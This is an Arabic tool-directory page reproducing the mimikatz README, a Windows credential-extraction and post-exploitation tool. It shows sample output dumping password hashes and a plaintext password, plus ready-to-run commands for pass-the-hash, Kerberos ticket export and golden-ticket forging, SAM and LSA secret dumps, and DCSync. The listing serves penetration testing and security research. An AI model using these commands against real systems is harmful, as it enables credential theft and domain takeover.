Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mimikatz — أداة صغيرة للعب مع أمان Windows | Kitploit
أدوات/GitHubGitHub/gentilkiwi/mimikatz
كسر كلمات المرورأطر اختبار الاختراقأطر الاستغلالهجمات كلمات المرورآليات الاستمراريةالاستغلالتحليل التجزئةالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
21.8k4.2k57منذ 4 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
الأفضل في الاستغلال #12
الأفضل في أطر الاستغلال #15
الأفضل في تحليل التجزئة #20
الأفضل في الحركة الجانبية #20
الأفضل في هجمات كلمات المرور #9
الأفضل في كسر كلمات المرور #9
الأفضل في أطر اختبار الاختراق #15
الأفضل في آليات الاستمرارية #11
الأفضل في ما بعد الاستغلال #3
الأفضل في الفريق الأحمر #10
GitHubgentilkiwi/mimikatz

mimikatz

أداة صغيرة للعب مع أمان Windows

عرض المستودعالموقع الإلكتروني

mimikatz

mimikatz هي أداة قمت بإنشائها لتعلم لغة C ولإجراء بعض التجارب على أمان Windows.

أصبحت الآن معروفة جيدًا لاستخراج كلمات المرور النصية العادية، والتجزئات (hashes)، ورموز PIN، وتذاكر Kerberos من الذاكرة. يمكن لـ mimikatz أيضًا تنفيذ pass-the-hash، أو pass-the-ticket، أو بناء تذاكر ذهبية (Golden tickets).

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

لكن هذا ليس كل شيء! Crypto، Terminal Server، Events، ... الكثير من المعلومات في GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki أو على https://blog.gentilkiwi.com (بالفرنسية، نعم).

إذا كنت لا ترغب في بنائه، فإن الملفات الثنائية متاحة على https://github.com/gentilkiwi/mimikatz/releases

استخدام سريع

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

بناء

mimikatz يأتي على شكل حل Visual Studio وبرنامج تشغيل WinDDK (اختياري للعمليات الرئيسية)، لذا فإن المتطلبات الأساسية هي:

  • لـ mimikatz و mimilib : Visual Studio 2010 أو 2012 أو 2013 لسطح المكتب (إصدار 2013 Express لسطح المكتب مجاني ويدعم x86 و x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • لـ برنامج تشغيل mimikatz، mimilove (ومنصة ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz يستخدم SVN للتحكم بالمصدر، ولكنه متاح الآن مع GIT أيضًا! يمكنك استخدام أي أدوات تريدها للمزامنة، حتى GIT المدمج في Visual Studio 2013 =)

مزامنة!

  • رابط GIT هو : https://github.com/gentilkiwi/mimikatz.git
  • رابط SVN هو : https://github.com/gentilkiwi/mimikatz/trunk
  • ملف ZIP هو : https://github.com/gentilkiwi/mimikatz/archive/master.zip

بناء الحل

  • بعد فتح الحل، Build / Build Solution (يمكنك تغيير البنية)
  • mimikatz الآن مبني وجاهز للاستخدام! (Win32 / x64 وحتى ARM64 إذا كنت محظوظًا)
    • قد تواجه خطأ MSB3073 بخصوص _build_.cmd و mimidrv، وذلك لأنه لا يمكن بناء برنامج التشغيل بدون Windows Driver Kit 7.1 (WinDDK)، لكن mimikatz و mimilib يعملان بشكل جيد.

ddk2003

مع منصة MSBuild الاختيارية هذه، يمكنك استخدام أدوات بناء WinDDK ووقت التشغيل الافتراضي msvcrt (ملفات ثنائية أصغر، بدون تبعيات)

لهذه المنصة الاختيارية، يجب توفر Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 و Visual Studio 2010، حتى لو كنت تخطط لاستخدام Visual Studio 2012 أو 2013 لاحقًا.

اتبع التعليمات:

  • https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

التكامل المستمر

مشروع mimikatz متاح على AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz

حالته: AppVeyor CI status

الترخيص

ترخيص CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz يحتاج إلى القهوة لتطويره:

  • PayPal: https://www.paypal.me/delpy/

المؤلف

Benjamin DELPY gentilkiwi، يمكنك الاتصال بي على Twitter ( @gentilkiwi ) أو عبر البريد الإلكتروني ( benjamin [at] gentilkiwi.com )

  • تمت كتابة وظائف DCSync و DCShadow في وحدة lsadump بالاشتراك مع Vincent LE TOUX، يمكنك الاتصال به عبر البريد الإلكتروني ( vincent.letoux [at] gmail.com ) أو زيارة موقعه على الويب ( http://www.mysmartlogon.com )

هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه في الأمور السيئة!

تنزيل الأداة